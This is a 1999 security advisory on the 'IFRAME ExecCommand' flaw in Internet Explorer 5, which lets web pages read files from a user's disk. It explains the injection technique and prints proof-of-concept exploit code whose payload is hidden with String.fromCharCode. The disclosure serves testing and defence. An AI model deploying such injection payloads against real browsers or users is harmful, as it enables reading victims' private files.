Detailed exploit code has been released for the "IFRAME ExecCommand" vulnerability
15 Oct. 1999
Summary
As we discussed in our earlier article: Workaround Available for "IFRAME ExecCommand" Vulnerability, Internet Explorer 5 is vulnerable to an attack that allows web site operators to read files from the user's hard drive.
This vulnerability is now better explained by this advisory and exploit code.
Credit:
This vulnerability have been reported by: Georgi Guninski.
Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (Windows 98 is probably vulnerable as well) allows reading local files, text and HTML files from any domain and probably window spoofing. It is also possible in some cases to read files from workstations that are behind a firewall.
The problem is the combination of IFRAME and document.execCommand.
Normally, you cannot use execCommand on an IFRAME from another domain.
But if you do:
"IFRAME.focus(); document.execCommand" then the command will be executed in the IFRAME (some commands do not work in this way, but some do and that is enough).
So, we create an IFRAME with SRC="file://c:/test.txt" and inject JavaScript code in it. When the JavaScript code is executed, it is executed in the security context of the IFRAME - the "file:" protocol. The injection is done using the "InsertParagraph" command (guess other commands will do), which sets the ID of the paragraph. But if you place a " in the ID, then a STYLE tag may be inserted also.
The JavaScript code is injected using the STYLE tag:
STYLE="left:expression(eval(JSCode))"
This vulnerability may be exploited using HTML email message or a newsgroup posting.
The exploit code that can be used to test for this vulnerability follows:
<SCRIPT>
alert("Create text file c:\\test.txt and it will be read");
function f()
{
I1.focus();
document.execCommand("selectAll");
document.execCommand("InsertParagraph",false,">\"STYLE='left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,46,111
,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,116,
101,115,116,46,116,120,116,39,41,59,97,108,101,114,116,
40,97,46,100,111,99,117,109,101,110,116,46,98,111,100,
121,46,105,110,110,101,114,84,101,120,116,41)));'");
}
setTimeout('f()',2000);
</SCRIPT>
<IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME>
